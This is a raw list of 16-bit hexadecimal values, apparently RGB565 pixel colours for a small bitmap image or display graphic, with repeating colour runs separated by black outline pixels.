0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xffff, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
